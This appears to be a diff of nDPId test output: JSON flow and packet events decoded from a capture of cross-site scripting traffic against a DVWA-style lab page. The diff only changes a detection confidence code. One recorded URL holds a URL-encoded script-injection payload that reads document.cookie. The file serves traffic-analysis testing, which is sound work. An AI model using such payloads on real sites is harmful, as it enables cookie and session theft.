+00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":1499347675703,"flow_last_seen":1499347745908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232186,"flow_avg_l4_payload_len":744,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347740751,"flow_last_seen":1499347745824,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60438,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347740751,"flow_last_seen":1499347745824,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60438,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347744595,"flow_last_seen":1499347749825,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60478,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} @@ -3061,7 +3061,7 @@ 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347748472,"flow_last_seen":1499347753827,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347749751,"flow_last_seen":1499347754827,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60532,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347749751,"flow_last_seen":1499347754827,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7563,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347872187,"flow_last_seen":1499347877028,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347877028,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33580,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7563,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347872187,"flow_last_seen":1499347877028,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347877028,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33580,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7567,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347877292,"flow_last_seen":1499347877292,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347877292,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33634,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7567,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":1,"flow_last_seen":1499347877292,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347877292,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8t4hAAD4GDkisEAABwKgKMoNiAFCEB9ewAAAAAKACchAeJQAAAgQFtAQCCAoBPGA4AAAAAAEDAwc="} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":535,"flow_packet_id":2,"flow_last_seen":1499347877292,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347877292,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg2I\/o2nZhAfXsaAScSA\/9QAAAgQFtAQCCAoD5jGsATxgOAEDAwc="} @@ -3266,7 +3266,7 @@ 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347810243,"flow_last_seen":1499347815843,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32932,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347811525,"flow_last_seen":1499347816843,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32946,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347811525,"flow_last_seen":1499347816843,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347743331,"flow_last_seen":1499347811268,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232375,"flow_avg_l4_payload_len":747,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8053,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"finished","flow_packets_processed":311,"flow_first_seen":1499347743331,"flow_last_seen":1499347811268,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232375,"flow_avg_l4_payload_len":747,"midstream":0,"thread_ts_msec":1499347936881,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347939286,"flow_last_seen":1499347939286,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347939286,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8062,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":1,"flow_last_seen":1499347939286,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347939286,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86O9AAD4G3OCsEAABwKgKMoXmAFBSpnQtAAAAAKACchBz+wAAAgQFtAQCCAoBPJzCAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8063,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":2,"flow_last_seen":1499347939286,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347939286,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQheYnhiyyUqZ0LqAScSCuhQAAAgQFtAQCCAoD5m42ATycwgEDAwc="} @@ -3275,7 +3275,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8074,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":1,"flow_last_seen":1499347940593,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347940593,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87cVAAD4G2AqsEAABwKgKMoX0AFCR9XPMAAAAAKACchAzuAAAAgQFtAQCCAoBPJ4JAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8075,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":2,"flow_last_seen":1499347940593,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347940593,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhfTE5Ae8kfVzzaAScSD0kgAAAgQFtAQCCAoD5m99ATyeCQEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8076,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":3,"flow_last_seen":1499347940594,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347940594,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07cZAAD4G2BGsEAABwKgKMoX0AFCR9XPNxOQHvYAQAOWTmgAAAQEICgE8ngkD5m99"} -01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347939286,"flow_last_seen":1499347941874,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347941874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27TNRH0PFRPCFVXECFZU2OUYBTDZQVIWB8HBZ1VC7EXA9PGMGBWA%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8089,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347939286,"flow_last_seen":1499347941874,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347941874,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34278,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27TNRH0PFRPCFVXECFZU2OUYBTDZQVIWB8HBZ1VC7EXA9PGMGBWA%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8099,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347943146,"flow_last_seen":1499347943146,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347943146,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34318,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8099,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":1,"flow_last_seen":1499347943146,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347943146,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TwNAAD4Gds2sEAABwKgKMoYOAFBjnu+EAAAAAKACchDjvgAAAgQFtAQCCAoBPKCHAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8100,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":2,"flow_last_seen":1499347943146,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347943146,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhg4T7s6FY57vhaAScSCMRwAAAgQFtAQCCAoD5nH8ATyghwEDAwc="} @@ -3472,7 +3472,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8551,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":1,"flow_last_seen":1499347998605,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347998605,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8MQxAAD4GlMSsEAABwKgKMohUAFBMT+e8AAAAAKACchDKZgAAAgQFtAQCCAoBPNawAAAAAAEDAwc="} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8552,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":2,"flow_last_seen":1499347998605,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347998605,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiFT+qOY2TE\/nvaAScSA6WwAAAgQFtAQCCAoD5qgkATzWsAEDAwc="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8553,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":604,"flow_packet_id":3,"flow_last_seen":1499347998606,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347998606,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MQ1AAD4GlMusEAABwKgKMohUAFBMT+e9\/qjmN4AQAOXZYQAAAQEICgE81rED5qgk"} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347807664,"flow_last_seen":1499347876003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232685,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"finished","flow_packets_processed":310,"flow_first_seen":1499347807664,"flow_last_seen":1499347876003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232685,"flow_avg_l4_payload_len":750,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347864367,"flow_last_seen":1499347869864,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33500,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347864367,"flow_last_seen":1499347869864,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":8560,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347867086,"flow_last_seen":1499347872866,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347998898,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33526,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} @@ -3499,7 +3499,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8611,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":1,"flow_last_seen":1499348006334,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348006334,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NJlAAD4GkTesEAABwKgKMoikAFAqsOqkAAAAAKACchDhQAAAAgQFtAQCCAoBPN49AAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8612,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":2,"flow_last_seen":1499348006334,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499348006334,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQiKQqwf7AKrDqpaAScSAFBgAAAgQFtAQCCAoD5q+xATzePQEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":3,"flow_last_seen":1499348006335,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499348006335,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NJpAAD4GkT6sEAABwKgKMoikAFAqsOqlKsH+wYAQAOWkDQAAAQEICgE83j0D5q+x"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8623,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":606,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499348002450,"flow_last_seen":1499348007347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499348007347,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34940,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 